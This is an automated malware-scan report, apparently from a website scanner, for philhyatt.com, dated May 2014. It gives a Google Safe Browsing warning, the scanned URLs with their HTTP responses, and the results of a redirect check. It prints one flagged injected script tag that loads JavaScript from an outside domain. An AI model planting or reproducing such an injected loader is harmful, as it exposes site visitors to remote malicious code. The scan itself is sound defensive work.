Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=philhyatt.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://philhyatt.com/ | 200 OK Content-Length: 648 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://pooppatrollers.com/dgctf48t.php?id=24420865"></script> | ||
http://gmodules.com/ig/ifr?url=http://www.google.com/ig/modules/googletalk.xml&synd=open&w=320&h=451&title=Google Talk&border= | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 15 May 2014 21:05:05 GMT Location: http://www.gmodules.com/ig/ifr?url=http://www.google.com/ig/modules/googletalk.xml&synd=open&w=320&h=451&title=Google%20Talk&border= Server: igfe Content-Length: 349 Content-Type: text/html; charset=UTF-8 Alternate-Protocol: 80:quic X-XSS-Protection: 1; mode=block | clean |
http://www.gmodules.com/ig/ifr?url=http://www.google.com/ig/modules/googletalk.xml&synd=open&w=320&h=451&title=google%20talk&border= | HTTP/1.1 302 Found Cache-Control: private, max-age=7200 Connection: close Date: Thu, 15 May 2014 21:05:05 GMT Location: http://www.gmodules.com/ig/ifr?url=no_info_available.xml&synd=open&w=320&h=451&title=google+talk&border= Server: igfe Content-Length: 321 Content-Type: text/html; charset=UTF-8 Expires: Thu, 15 May 2014 21:05:05 GMT Alternate-Protocol: 80:quic X-Content-Type-Options: nosniff X-Frame-Options: ALLOWALL X-XSS-Protection: 1; mode=block | clean |
http://www.gmodules.com/ig/ifr?url=no_info_available.xml&synd=open&w=320&h=451&title=google+talk&border= | 200 OK Content-Length: 2041 Content-Type: text/html | clean |
http://www.gmodules.com//www-ig-opensocial.googleusercontent.com/gadgets/js/rpc.js?container=ig&nocache=0&debug=0&c=1&v=d30b8b5668c233bafcf12346b6771e3e&sv=11/ | 404 Not Found Content-Length: 1579 Content-Type: text/html | clean |
http://www.gmodules.com//www.google.com/ | 404 Not Found Content-Length: 1440 Content-Type: text/html | clean |
http://www.gmodules.com/test404page.js | 404 Not Found Content-Length: 1439 Content-Type: text/html | clean |
http://gmodules.com/ig/extern_js/f/CgJlbisw8gE4ACwrMP4BOAAskAIc/2ACK6nf2o8w.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 15 May 2014 21:05:06 GMT Location: http://www.gmodules.com/ig/extern_js/f/CgJlbisw8gE4ACwrMP4BOAAskAIc/2ACK6nf2o8w.js Server: igfe Content-Length: 279 Content-Type: text/html; charset=UTF-8 Alternate-Protocol: 80:quic X-XSS-Protection: 1; mode=block | clean |
http://www.gmodules.com/ig/extern_js/f/cgjlbisw8ge4acwrmp4boaaskaic/2ack6nf2o8w.js | 404 Not Found Content-Length: 1483 Content-Type: text/html | clean |
http://gmodules.com//www.google.com/ | 404 Not Found Content-Length: 1440 Content-Type: text/html | clean |
http://philhyatt.com//www.google.com/ | 404 Not Found Content-Length: 613 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: philhyatt.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 15 May 2014 21:05:05 GMT
Accept-Ranges: bytes
ETag: "150087c-288-4f835dc0f8778"
Server: Apache
Content-Length: 648
Content-Type: text/html
Last-Modified: Tue, 29 Apr 2014 22:21:55 GMT
...648 bytes of data.
GET / HTTP/1.1
Host: philhyatt.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 15 May 2014 21:05:05 GMT
Accept-Ranges: bytes
ETag: "150087c-288-4f835dc0f8778"
Server: Apache
Content-Length: 648
Content-Type: text/html
Last-Modified: Tue, 29 Apr 2014 22:21:55 GMT
...648 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: philhyatt.com
Referer: http://www.google.com/search?q=philhyatt.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: philhyatt.com
Referer: http://www.google.com/search?q=philhyatt.com
Result:
The result is similar to the first query. There are no suspicious redirects found.